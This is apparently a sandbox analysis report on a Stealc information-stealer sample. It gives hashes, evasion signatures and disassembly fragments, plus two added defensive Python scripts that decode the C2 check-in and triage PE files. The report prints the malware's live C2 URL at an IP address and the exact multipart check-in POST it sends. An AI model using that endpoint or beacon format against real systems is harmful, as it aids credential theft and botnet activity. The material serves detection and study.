Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543701
MD5: f522fe27067daea4f7987bf85ec1e287
SHA1: d3179eac21c33134b326721db3eec7b7d1f1ac5f
SHA256: 3c60d4aebf5332d3a7fc6ea700f8ab74addba285246ba9cf94968a41cc11480a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F522FE27067DAEA4F7987BF85EC1E287)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches (Source | Rule | Description | Author):
    dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
    00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
    00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
    00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
    Process Memory Space: file.exe PID: 6828 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
    Process Memory Space: file.exe PID: 6828 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
    0.2.file.exe.d30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alert (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
    2024-10-28T09:24:20.252534+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49729 | 185.215.113.206:80 | TCP

                AV Detection

                Source: file.exe | Avira: detected
                Source: 0.2.file.exe.d30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Source: Submitted sample | Integrated Neural Analysis Model: matched with 100.0% probability
                Source: file.exe | Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3A2B0 CryptUnprotectData,LocalAlloc,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49729 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a
                    Data Ascii:
                        ------HDBGHDHCGHCAAKEBKECB
                        Content-Disposition: form-data; name="hwid"

                        C131A13CAC433430373531
                        ------HDBGHDHCGHCAAKEBKECB
                        Content-Disposition: form-data; name="build"

                        tale
                        ------HDBGHDHCGHCAAKEBKECB--
                Source: Joe Sandbox View | IP Address: 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                Source: file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/(
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php5e
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpS
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/:
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/i
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
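The check-in POST captured above, decoded and matched offline. The block below is an added example and is not part of the Joe Sandbox report or of Stealc: the body bytes are the report's Data Raw hex, the headers are transcribed from the report, and the heuristic encodes what the report's own signatures state (a POST to a .php path with no User-Agent header carrying the multipart fields hwid and build), then compares the build value with the Botnet value of the extracted configuration. The function names, the list of reasons and the Content-Length sanity check are this example's own choices.

```python
"""Decode the Stealc C2 check-in POST captured above and flag it offline."""
import re

# Copied from the report's "Data Raw" field: the 211-byte multipart POST body.
RAW_BODY_HEX = """
2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a
2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
74 61 6c 65 0d 0a
2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a
"""

# Request line and headers transcribed from the report (note: no User-Agent is sent).
REQUEST = {
    "method": "POST",
    "path": "/6c4adf523b719729.php",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB",
        "Host": "185.215.113.206",
        "Content-Length": "211",
        "Connection": "Keep-Alive",
        "Cache-Control": "no-cache",
    },
}

# Configuration the report extracted; the check-in's "build" field should equal "Botnet".
EXTRACTED_CONFIG = {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser returning {field_name: raw_value}."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(2).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # "--boundary--" closes the body
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def classify_checkin(request: dict, body: bytes, config: dict = EXTRACTED_CONFIG) -> dict:
    """Apply the traits the report lists for the Stealc check-in to one request."""
    headers = {k.lower(): v for k, v in request["headers"].items()}
    reasons = []
    if request["method"] == "POST" and request["path"].endswith(".php"):
        reasons.append("POST to .php endpoint")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if headers.get("content-length") != str(len(body)):
        reasons.append("Content-Length mismatch (truncated capture?)")
    fields = {}
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        fields = parse_multipart(ctype, body)
        if {"hwid", "build"}.issubset(fields):
            reasons.append("multipart fields hwid and build")
    build = fields.get("build", b"").decode(errors="replace")
    required = {"POST to .php endpoint", "no User-Agent header", "multipart fields hwid and build"}
    return {
        "match": required.issubset(reasons),
        "reasons": reasons,
        "hwid": fields.get("hwid", b"").decode(errors="replace"),
        "build": build,
        "build_matches_config": build == config.get("Botnet"),
    }


if __name__ == "__main__":
    result = classify_checkin(REQUEST, bytes.fromhex(RAW_BODY_HEX))
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run as is to print the decoded hwid and build fields; to apply it to another capture, replace RAW_BODY_HEX and REQUEST with the request taken from the pcap. The heuristic is deliberately narrow and is a triage aid for traffic already under suspicion, not a replacement for the Suricata signature listed above.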

                System Summary

                Source: file.exe | Static PE information: section name: (name not printable)
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name: (name not printable)
                Source: C:\Users\user\Desktop\file.exe | Code functions (unnamed, listed by address): 0_2_00D70098, 0_2_00D8B198, 0_2_0118D050, 0_2_011980DC, 0_2_00D62138, 0_2_00D74288, 0_2_00D9E258, 0_2_00DAD39E, 0_2_01183254, 0_2_01188284, 0_2_00DBB308, 0_2_0119051F, 0_2_00D9D5A8, 0_2_00D745A8, 0_2_00D5E544, 0_2_00D54573, 0_2_0113D703, 0_2_00D766C8, 0_2_01186739, 0_2_00DB96FD, 0_2_00DAA648, 0_2_010F77F7, 0_2_0118B60E, 0_2_01038639, 0_2_00DA6799, 0_2_00D8D720, 0_2_01059905, 0_2_00D9F8D6, 0_2_00D898B8, 0_2_00D8B8A8, 0_2_00D84868, 0_2_00DA0B88, 0_2_00DA4BA8, 0_2_01198AE7, 0_2_0122AD22, 0_2_00DAAC28, 0_2_00D84DC8, 0_2_00D85DB9, 0_2_01189CBA, 0_2_00D61D78, 0_2_00D8BD68, 0_2_00D9AD38, 0_2_00DA1EE8, 0_2_00D78E78, 0_2_01216EB5
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00D34610 appears 316 times
                Source: file.exe | Static PE information: Section: pngrdmjc ZLIB complexity 0.9948482190148306
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5J6FG5MR.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Sections loaded (in order): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe | Static file information: File size 2129920 > 1048576
                Source: file.exe | Static PE information: Raw size of pngrdmjc is bigger than: 0x100000 < 0x19d000

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d30000.0.unpack
                    section rights after unpacking: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; pngrdmjc:EW; vsguhmza:EW; .taggant:EW
                    section rights on disk:         (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; pngrdmjc:EW; vsguhmza:EW; .taggant:EW
                    (the first, unnamed section goes from execute/read on disk to execute/write once unpacked, which is the change the "changes PE section rights" signature reports)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49BB0
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x21493d should be: 0x20bf42
                Source: file.exe | Static PE information: section names: (name not printable), .rsrc, .idata, (name not printable), pngrdmjc, vsguhmza, .taggant
                Source: C:\Users\user\Deskt2op\file.exe | Code function: 0_2_0122B122 push 61C01C88h; mov dword ptr [esp], esp (at 0_2_0122B259)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5A0DC push eax; retf (at 0_2_00D5A0F1)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5A0F2 push eax; retf (at 0_2_00D5A119)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0120416D push 421BFCC3h; mov dword ptr [esp], edi (at 0_2_01204190)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012381AB push 1C151EE5h; mov dword ptr [esp], ebp (at 0_2_012381D1)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012381AB push edi; mov dword ptr [esp], edx (at 0_2_01238235)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0125D03C push 761406FBh; mov dword ptr [esp], esi (at 0_2_0125D081)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0125D03C push 2C37DD47h; mov dword ptr [esp], edx (at 0_2_0125D115)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B9023 push edx; mov dword ptr [esp], ebp (at 0_2_011B907D)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ecx; mov dword ptr [esp], eax (at 0_2_0118D06E)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push edx; mov dword ptr [esp], 69FD8B6Fh (at 0_2_0118D0F9)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push eax; mov dword ptr [esp], ebp (at 0_2_0118D108)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 63BCAFB8h; mov dword ptr [esp], ebp (at 0_2_0118D181)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push esi; mov dword ptr [esp], 7FD78C74h (at 0_2_0118D192)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 62553831h; mov dword ptr [esp], esi (at 0_2_0118D23A)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push eax; mov dword ptr [esp], ebp (at 0_2_0118D270)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 61E43BE7h; mov dword ptr [esp], esi (at 0_2_0118D33D)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 2842D236h; mov dword ptr [esp], ebx (at 0_2_0118D3A5)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ebx; mov dword ptr [esp], 45340E4Ch (at 0_2_0118D48E)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ecx; mov dword ptr [esp], ebp (at 0_2_0118D4A1)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ebp; mov dword ptr [esp], esi (at 0_2_0118D4BF)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push edi; mov dword ptr [esp], 7BBF7215h (at 0_2_0118D4C3)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ecx; mov dword ptr [esp], 54CBEFC5h (at 0_2_0118D571)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 149B18F0h; mov dword ptr [esp], ebp (at 0_2_0118D5FB)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ebp; mov dword ptr [esp], edx (at 0_2_0118D64A)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 55FFB401h; mov dword ptr [esp], ecx (at 0_2_0118D6F6)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push edi; mov dword ptr [esp], eax (at 0_2_0118D796)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 2A34903Eh; mov dword ptr [esp], edx (at 0_2_0118D855)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push ebx; mov dword ptr [esp], edx (at 0_2_0118D859)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push 0970A36Bh; mov dword ptr [esp], ecx (at 0_2_0118D903)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118D050 push edi; mov dword ptr [esp], edx (at 0_2_0118D92E)
                Source: file.exe | Static PE information: section name: pngrdmjc entropy: 7.954059583965191
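The three static findings in this section (a stored checksum of 0x21493d against a computed 0x20bf42, unprintable and non-standard section names, and a 7.95-entropy section named pngrdmjc) can be reproduced without the sandbox. The block below is an added example, not Joe Sandbox code: it recomputes the PE checksum with the standard image-checksum algorithm, walks the section table with struct, and scores each section's entropy. The build_sample_pe helper constructs a skeletal PE so the script runs offline; the 7.0 entropy threshold and the list of "standard" section names are this example's own assumptions.

```python
"""Static PE triage: checksum mismatch, odd section names, section entropy."""
import math
import struct

STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Image checksum as CheckSumMappedFile computes it: 32-bit end-around-carry
    sum of the file (skipping the CheckSum field itself), folded to 16 bits,
    plus the file length. Assumption: checksum_offset is 4-byte aligned."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform (packed/encrypted)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def section_name_findings(raw_name: bytes) -> list:
    """The two name conditions the report raises: empty/unprintable, non-standard."""
    name = raw_name.rstrip(b"\0")
    findings = []
    if not name:
        findings.append("empty name")
    elif any(c < 0x20 or c > 0x7E for c in name):
        findings.append("unprintable characters in name")
    if name.decode("latin-1") not in STANDARD_SECTION_NAMES:
        findings.append("non-standard name")
    return findings


def triage_pe(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Walk DOS header -> PE header -> section table and run the checks above."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    stored = struct.unpack_from("<I", data, opt_off + 64)[0]  # OptionalHeader.CheckSum
    computed = pe_checksum(data, opt_off + 64)
    sections = []
    for i in range(num_sections):
        hdr = opt_off + opt_size + 40 * i
        raw_name = data[hdr:hdr + 8]
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        entropy = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        findings = section_name_findings(raw_name)
        if entropy >= entropy_threshold:
            findings.append("high entropy")
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "entropy": round(entropy, 3), "findings": findings})
    return {"stored_checksum": stored, "computed_checksum": computed,
            "checksum_ok": stored in (0, computed),  # 0 means the field was never set
            "sections": sections}


def build_sample_pe(section_name: bytes, body: bytes, checksum: int = 0) -> bytes:
    """Constructed input for offline runs (not a real binary): skeletal PE32, one section."""
    e_lfanew, opt_size = 0x40, 0xE0
    sec_hdr = e_lfanew + 24 + opt_size
    raw_ptr = sec_hdr + 40
    buf = bytearray(raw_ptr) + bytearray(body)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, e_lfanew + 6, 1)           # NumberOfSections
    struct.pack_into("<H", buf, e_lfanew + 20, opt_size)   # SizeOfOptionalHeader
    struct.pack_into("<H", buf, e_lfanew + 24, 0x10B)      # PE32 magic
    struct.pack_into("<I", buf, e_lfanew + 24 + 64, checksum)
    buf[sec_hdr:sec_hdr + 8] = section_name.ljust(8, b"\0")
    struct.pack_into("<II", buf, sec_hdr + 16, len(body), raw_ptr)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample_pe(b"pngrdmjc", bytes(range(256)) * 4)
    print(triage_pe(data))
```

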